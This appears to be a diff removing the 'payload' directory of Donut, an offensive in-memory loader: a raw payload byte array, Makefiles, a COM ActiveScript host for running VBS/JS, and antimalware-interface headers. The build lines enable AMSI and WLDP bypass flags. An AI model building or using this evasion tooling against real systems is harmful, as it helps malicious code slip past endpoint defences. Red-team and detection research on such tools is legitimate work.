2046 0xb6, 0x10, 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
2047 0x74, 0x02, 0xeb, 0x0b, 0x83, 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85,
2048 0xc0, 0x7f, 0xd9, 0x83, 0x7d, 0x14, 0x00, 0x0f, 0x85, 0x39, 0xff, 0xff,
2049 0xff, 0x90, 0x90, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0xff, 0xff, 0xff, 0xff,
2050 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00};
2051
+0
-12
payload/Makefile.mingw less more
0 x64:
1 x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
2 exe2h/exe2h payload.exe
3 x86:
4 i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
5 exe2h/exe2h payload.exe
6 debug_x64:
7 x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
8 debug_x86:
9 i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
10 clean:
11 rm *.o payload.exe
+0
-9
payload/Makefile.msvc less more
0 payload:
1 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
2 link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
3 exe2h\exe2h payload.exe
4 debug:
5 cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
6 link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
7 clean:
8 del *.obj payload.exe
+0
-186
payload/activescript.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
55 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
56
57 DPRINT("IActiveScriptSite::QueryInterface");
58
59 if(ppv == NULL) return E_POINTER;
60
61 // we implement the following interfaces
62 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
63 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
64 {
65 *ppv = (LPVOID)this;
66 ActiveScript_AddRef(this);
67 return S_OK;
68 }
69 *ppv = NULL;
70 return E_NOINTERFACE;
71 }
72
73 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
74 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
75
76 _InterlockedIncrement(&mas->site.m_cRef);
77
78 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
79
80 return mas->site.m_cRef;
81 }
82
83 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
84 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
85
86 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
87
88 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
89 return ulRefCount;
90 }
91
92 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
93 LPCOLESTR objectName, DWORD dwReturnMask,
94 IUnknown **objPtr, ITypeInfo **ppti)
95 {
96 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
97
98 DPRINT("IActiveScriptSite::GetItemInfo");
99
100 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
101 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
102 if(ppti == NULL) return E_POINTER;
103
104 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
105 *ppti = mas->wscript.lpTypeInfo;
106 }
107
108 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
109 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
110 if(objPtr == NULL) return E_POINTER;
111
112 mas->wscript.lpVtbl->AddRef(&mas->wscript);
113 *objPtr = (IUnknown*)&mas->wscript;
114 }
115
116 return S_OK;
117 }
118
119 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
120 IActiveScriptError *scriptError)
121 {
122 DPRINT("IActiveScriptSite::OnScriptError");
123
124 EXCEPINFO ei;
125 DWORD dwSourceContext = 0;
126 ULONG ulLineNumber = 0;
127 LONG ichCharPosition = 0;
128 HRESULT hr;
129
130 Memset(&ei, 0, sizeof(EXCEPINFO));
131
132 DPRINT("IActiveScriptError::GetExceptionInfo");
133 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
134 if(hr == S_OK) {
135 DPRINT("IActiveScriptError::GetSourcePosition");
136 hr = scriptError->lpVtbl->GetSourcePosition(
137 scriptError, &dwSourceContext,
138 &ulLineNumber, &ichCharPosition);
139 if(hr == S_OK) {
140 DPRINT("JSError: %ws line[%d:%d]\n",
141 ei.bstrDescription, ulLineNumber, ichCharPosition);
142 }
143 }
144 return S_OK;
145 }
146
147 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
148 DPRINT("IActiveScriptSite::GetLCID");
149 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
150
151 *plcid = mas->inst->api.GetUserDefaultLCID();
152 return S_OK;
153 }
154
155 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
156 DPRINT("IActiveScriptSite::GetDocVersionString");
157
158 return S_OK;
159 }
160
161 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
162 const VARIANT *pvr, const EXCEPINFO *pei)
163 {
164 DPRINT("IActiveScriptSite::OnScriptTerminate");
165
166 return S_OK;
167 }
168
169 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
170 DPRINT("IActiveScriptSite::OnStateChange");
171
172 return S_OK;
173 }
174
175 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
176 DPRINT("IActiveScriptSite::OnEnterScript");
177
178 return S_OK;
179 }
180
181 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
182 DPRINT("IActiveScriptSite::OnLeaveScript");
183
184 return S_OK;
185 }
+0
-436
payload/activescript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 } ActiveScriptSiteWindow;
302
303 typedef struct _IActiveScriptErrorVtbl {
304 BEGIN_INTERFACE
305
306 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
307 IActiveScriptError * This,
308 /* [in] */ REFIID riid,
309 /* [annotation][iid_is][out] */
310 void **ppvObject);
311
312 ULONG ( STDMETHODCALLTYPE *AddRef )(
313 IActiveScriptError * This);
314
315 ULONG ( STDMETHODCALLTYPE *Release )(
316 IActiveScriptError * This);
317
318 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
319 IActiveScriptError * This,
320 /* [out] */ EXCEPINFO *pexcepinfo);
321
322 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
323 IActiveScriptError * This,
324 /* [out] */ DWORD *pdwSourceContext,
325 /* [out] */ ULONG *pulLineNumber,
326 /* [out] */ LONG *plCharacterPosition);
327
328 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
329 IActiveScriptError * This,
330 /* [out] */ BSTR *pbstrSourceLine);
331
332 END_INTERFACE
333 } IActiveScriptErrorVtbl;
334
335 typedef struct _IActiveScriptError {
336 IActiveScriptErrorVtbl *lpVtbl;
337 } ActiveScriptError;
338
339 typedef struct _IActiveScriptSiteVtbl {
340 BEGIN_INTERFACE
341
342 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
343 IActiveScriptSite * This,
344 /* [in] */ REFIID riid,
345 /* [annotation][iid_is][out] */
346 void **ppvObject);
347
348 ULONG ( STDMETHODCALLTYPE *AddRef )(
349 IActiveScriptSite * This);
350
351 ULONG ( STDMETHODCALLTYPE *Release )(
352 IActiveScriptSite * This);
353
354 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
355 IActiveScriptSite * This,
356 /* [out] */ LCID *plcid);
357
358 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
359 IActiveScriptSite * This,
360 /* [in] */ LPCOLESTR pstrName,
361 /* [in] */ DWORD dwReturnMask,
362 /* [out] */ IUnknown **ppiunkItem,
363 /* [out] */ ITypeInfo **ppti);
364
365 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
366 IActiveScriptSite * This,
367 /* [out] */ BSTR *pbstrVersion);
368
369 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
370 IActiveScriptSite * This,
371 /* [in] */ const VARIANT *pvarResult,
372 /* [in] */ const EXCEPINFO *pexcepinfo);
373
374 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
375 IActiveScriptSite * This,
376 /* [in] */ SCRIPTSTATE ssScriptState);
377
378 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
379 IActiveScriptSite * This,
380 /* [in] */ IActiveScriptError *pscripterror);
381
382 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
383 IActiveScriptSite * This);
384
385 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
386 IActiveScriptSite * This);
387
388 END_INTERFACE
389 } IActiveScriptSiteVtbl;
390
391 typedef struct _IActiveScriptSite {
392 IActiveScriptSiteVtbl *lpVtbl;
393 ULONG m_cRef; // reference count (not part of original definition of course)
394 } ActiveScriptSite;
395
396 #ifdef _WIN64
397 #define IActiveScriptParse IActiveScriptParse64
398 #define IID_IActiveScriptParse IID_IActiveScriptParse64
399 #else
400 #define IActiveScriptParse IActiveScriptParse32
401 #define IID_IActiveScriptParse IID_IActiveScriptParse32
402 #endif
403
404 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
405
406 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
407 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
408 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
409
410 // Informs the host that the scripting engine has begun executing the script code.
411 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
412
413 // Informs the host that the scripting engine has returned from executing script code.
414 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
415
416 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
417 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
418
419 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
420 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
421
422 // Informs the host that an execution error occurred while the engine was running the script.
423 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
424
425 // Informs the host that the scripting engine has changed states.
426 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
427
428 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
429 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
430
431 // Called when the script has completed execution.
432 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
433
434 #endif
435
+0
-182
payload/amsi.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
